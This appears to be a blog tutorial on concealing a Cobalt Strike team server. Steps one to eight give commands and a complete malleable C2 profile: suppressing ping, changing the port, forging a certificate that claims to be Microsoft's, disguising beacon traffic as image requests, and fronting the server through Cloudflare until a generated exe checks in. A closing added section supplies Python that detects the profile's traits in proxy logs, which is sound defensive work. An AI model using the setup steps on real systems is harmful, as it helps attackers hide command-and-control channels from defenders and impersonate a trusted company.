Last updated: 2022-03-08 20:45:02

1. Disable ping responses on the server

Command:

> `vim /etc/sysctl.conf`

Add one line:

> `net.ipv4.icmp_echo_ignore_all = 1`

Save, then reload the configuration:

> `sysctl -p`

2. Change the Cobalt Strike port

Edit the `teamserver` file.

![2021-12-17T09:50:44.png][1]

Change `50050` to another port.

3. Replace the default CS certificate

Edit the `teamserver` file.

> `keytool -keystore <keystore file name> -storepass <password> -keypass <password> -genkey -keyalg RSA -alias <alias> -dname "CN=*.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US"`

> `keytool -keystore ./cobaltstrike.store -storepass Microsoft -keypass Microsoft -genkey -keyalg RSA -alias cobaltstrike -dname "CN=*.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US"`

Changing a few of the keyword fields is enough.

4. Change the traffic characteristics: create a new `.profile` file

```
https-certificate {
    set keystore "new.store";   # keystore file name
    set password "bypass";      # keystore password
}
# The block above can be left out until Cloudflare is configured

http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Host" "xxxx.net";   # domain name; comment this line out until Cloudflare is configured
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append ".jpg";          # suffix appended automatically to the transmitted data
            uri-append;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Apache";
        header "X-Powered-By" "Apache";
        output {
            base64;                 # encoding method (base64, base64url, netbios, netbiosu)
            print;
        }
    }
}

http-post {
    set uri "/email/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com";
        header "Host" "xxxx.net";   # domain name; comment this line out until Cloudflare is configured
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".png";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Apache";
        header "X-Powered-By" "Apache";
        output {
            base64;
            print;
        }
    }
}

http-config {
    set headers "Server, Cache-Control, Connection, X-Powered-By";
    header "Server" "Apache";
    header "Cache-Control" "max-age=1";
    header "Connection" "keep-alive";
    header "X-Powered-By" "Apache";
    set trust_x_forwarded_for "true";
}
```

Adjust the configuration as the comments indicate.

Then test the configuration:

> `./c2lint xxx.profile`

![2021-12-17T10:13:11.png][2]

The test passes.

5. Add the domain to Cloudflare and change the DNS

Enable Automatic HTTPS Rewrites.

![2021-12-17T10:16:06.png][3]

Enable Always Use HTTPS.

![2021-12-17T10:16:33.png][4]

Disable Brotli.

![2021-12-17T10:17:13.png][5]

Enable Development Mode.

![2021-12-17T10:17:55.png][6]

Point the record at the server IP.

![2021-12-17T10:18:41.png][7]

Set SSL/TLS to `Full`.

![2021-12-17T10:19:12.png][8]

Click `Origin Server` - `Create Certificate` - `Create`.

![2021-12-17T10:32:50.png][9]

Copy the two values, save them as a `.pem` file and a `.key` file respectively, and upload both to the server.

6. Create the store certificate

> `openssl pkcs12 -export -in <certificate file> -inkey <private key file> -out <p12 file name> -name <domain> -passout pass:<password>`

> `openssl pkcs12 -export -in xxx.pem -inkey xxx.key -out xxx.p12 -name xxxxx.com -passout pass:password`

> `keytool -importkeystore -deststorepass <password> -destkeypass <password> -destkeystore <new store name> -srckeystore <p12 file name> -srcstoretype PKCS12 -srcstorepass <password> -alias <alias>`

> `keytool -importkeystore -deststorepass password -destkeypass password -destkeystore xxx.store -srckeystore xxx.p12 -srcstoretype PKCS12 -srcstorepass password -alias xxxx`

7. Modify the `.profile` file created earlier

8. Test the configuration

> `./teamserver <server IP> <password> xxx.profile`

Start the listener.

![2021-12-17T10:40:50.png][10]

The HTTPS ports usable through Cloudflare are: 443, 2053, 2083, 2087, 2096, 8443.

Generate the exe program and run it.

The host checks in successfully.

![2021-12-17T10:43:18.png][11]

References:

https://lengjibo.github.io/malleable/

https://bbs.zkaq.cn/t/5775.html

[1]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/548525305.png
[2]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/3770253967.png
[3]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/417516751.png
[4]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/791090077.png
[5]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/2755797092.png
[6]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/1580821730.png
[7]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/511823449.png
[8]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/22497855.png
[9]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/3404110373.png
[10]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/4049818146.png
[11]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/2613382320.png
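
For defenders, the profile in step 4 fixes several observable request and response traits. The following is an added example, not part of the original post, that matches those traits in proxy-log records; it assumes logs from a TLS-inspecting proxy, and the record field names, the minimum token length and the sample records are constructed for illustration.

```python
import re

# netbios encoding writes each byte as two letters a-p (netbiosu: A-P),
# so the token the profile appends to the URI always has even length.
GET_URI = re.compile(r"^/image/((?:[a-p]{2}){8,})\.jpg$")  # min length is an assumption
POST_URI = re.compile(r"^/email/((?:[A-P]{2})+)\.png$")


def netbios_decode(token: str) -> bytes:
    """Reverse netbios/netbiosu: each letter pair is one byte, high nibble first."""
    base = ord("a") if token.islower() else ord("A")
    return bytes(((ord(token[i]) - base) << 4) | (ord(token[i + 1]) - base)
                 for i in range(0, len(token), 2))


def match_profile(rec: dict) -> list:
    """Return the traits of the step 4 profile that one proxy-log record shows."""
    hits = []
    uri = rec.get("uri", "")
    if rec.get("method") == "GET" and GET_URI.match(uri):
        hits.append("get-uri")
    # A POST of application/octet-stream to a .png path is unusual in itself.
    if (rec.get("method") == "POST" and POST_URI.match(uri)
            and rec.get("req_content_type") == "application/octet-stream"):
        hits.append("post-uri")
    # "img/jpg" is not a registered media type; JPEG is served as image/jpeg.
    if rec.get("resp_content_type") == "img/jpg":
        hits.append("resp-content-type")
    # The profile's Accept value carries the malformed media range "*/*l".
    if "*/*l;" in rec.get("accept", ""):
        hits.append("accept-header")
    return hits


# Constructed sample records; the field names are assumptions, not a real schema.
SAMPLE_LOG = [
    {"method": "GET", "uri": "/image/" + "gbgc" * 8 + ".jpg",
     "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8",
     "resp_content_type": "img/jpg"},
    {"method": "POST", "uri": "/email/DBDCDD.png",
     "req_content_type": "application/octet-stream", "resp_content_type": "img/jpg"},
    {"method": "GET", "uri": "/image/banner-01.jpg",
     "accept": "image/avif,image/webp,*/*;q=0.8", "resp_content_type": "image/jpeg"},
]

if __name__ == "__main__":
    for rec in SAMPLE_LOG:
        print(rec["method"], rec["uri"][:24], match_profile(rec))
```

A record that shows two or more traits is a stronger signal than a URI match alone, since ordinary image paths can also consist of the letters a-p.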